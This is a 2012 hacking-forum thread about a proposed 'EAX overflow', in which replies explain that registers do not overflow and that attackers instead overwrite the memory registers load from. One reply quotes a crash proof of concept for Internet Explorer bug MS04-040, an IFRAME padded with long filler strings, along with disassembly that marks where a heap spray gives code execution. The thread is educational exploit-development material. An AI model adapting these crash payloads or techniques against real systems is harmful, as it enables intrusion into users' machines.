EAX overflow(An Idea)

**H@CK3R_ADI** · 08-13-2012, 04:36 PM

Hello to all Garagians yesterday I got an Idea what about doing EAX overflow I just wanted to know what do you think about this IDEA ....

Your questions,comments,suggestions,etc....are welcome

**sebas_phoenix** · 08-13-2012, 07:09 PM

Be more elaborate! There is no such thing as a register overflow (except arithmetic overflow..but they are not relevant to our discussion here) , what actually happens is that we overflow the memory from where the register gets these values! So yeah, it doesn't matter if it is EAX or EBX or whatever as long as the condition facilitate code execution!

Originally Posted by H@CK3R_ADI

Hello to all Garagians yesterday I got an Idea what about doing EAX overflow I just wanted to know what do you think about this IDEA ....

Your questions,comments,suggestions,etc....are welcome

**"vinnu"** · 08-14-2012, 01:00 PM

EAX (or any register) is a kind of bucket, we sink it in a big tank no matter how much it is filled (or even overflowed), then take it out, it will be containing only the fixed volume every time at the most no matter how long u keep it inside the tank.

Kindly specify, how you want to overflow EAX otherwise?

**fb1h2s** · 08-14-2012, 01:02 PM

Well I think what you are trying convey is , you tried some fuzzing and app crashed with EAX register overflown !!!. Any way sebas has explained where you are wrong .

The general idea is get control of the program flow by taking control over some instruction via a controlled register .

Check out this exploit.

Garage4hackers Forum - dbpwoerammpl local exploit a different scenario

Cheers.

**H@CK3R_ADI** · 08-14-2012, 02:12 PM

what about doing indirect overflow that first load it on regs and then into memory

**"vinnu"** · 08-14-2012, 03:02 PM

Overflowing my memory, elaborate a little more, this could be a new technique or may lead to any zeroday... "vinnu"

**H@CK3R_ADI** · 08-14-2012, 03:48 PM

This can be used to bypass security sys(s) just load val in reg then into mem...What do you think........What about use this to execute malicious code

**sebas_phoenix** · 08-14-2012, 11:47 PM

Originally Posted by H@CK3R_ADI

This can be used to bypass security sys(s) just load val in reg then into mem...What do you think........What about use this to execute malicious code

Kindly be more elaborate by providing some pseudocode as to how you think it might happen! Then it will be easier for others to clarify

**Rashid bhatt** · 09-17-2012, 01:51 AM

Eax cant be overflow(becaz ofcourse its a reg and not a mem range) but can be written by bogus values and such exploits already exits not a new concept though one of those a re use after free

a classical Example would be Microsoft Security Bulletin MS04-040 : Cumulative Security Update for Internet Explorer (889293)

<IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"></IFRAME>
</body>
</HTML>

It triggers a crash at SHDOCVW.dll

769F6D36 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] //parameter overwritter stack
769F6D39 85C0 TEST EAX,EAX
769F6D3B ^0F84 45FBFFFF JE SHDOCVW.769F6886
769F6D41 E9 560E0100 JMP SHDOCVW.76A07B9C
769F6D46 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
769F6D4A 8B80 00140000 MOV EAX,DWORD PTR DS:[EAX+1400]
769F6D50 85C0 TEST EAX,EAX
769F6D52 0F84 330E0100 JE SHDOCVW.76A07B8B
769F6D58 FF7424 08 PUSH DWORD PTR SS:[ESP+8]
769F6D5C 8B08 MOV ECX,DWORD PTR DS:[EAX] /// this is where things gets shaped up ?? works with a heap spray
769F6D5E 68 98659C76 PUSH SHDOCVW.769C6598
769F6D63 50 PUSH EAX
769F6D64 FF11 CALL DWORD PTR DS:[ECX]

Thanks!

**"vinnu"** · 11-25-2012, 09:56 AM

Namaste

note the instructions:

Code:

769F6D5C 8B08 MOV ECX,DWORD PTR DS:[EAX] /// this is where things gets shaped up ?? works with a heap spray
769F6D5E 68 98659C76 PUSH SHDOCVW.769C6598
769F6D63 50 PUSH EAX
769F6D64 FF11 CALL DWORD PTR DS:[ECX]

What else you need? Its a direct code execution vulnerability. and if you control EAX you control ECX and there you are.

EAX doesnt get any bogus value but user supplied input (directly or indirectly in this case).

Again registers do not overflow, but only take values according to their volume (bits like 32 bit, 16 bit, 64 bit etc.) and EAX takes a DWORD (all 32 bit- general purpose registers and EAX is a general purpose 32bit register).

A bucket will always contain fixed volume everytime you fill it completely (upto its maximum limit ) and overflown water will get spilled out of it but not inside the bucket.

..."vinnu"

Thread: EAX overflow(An Idea)

LinkBack

Thread Tools

Search Thread

Display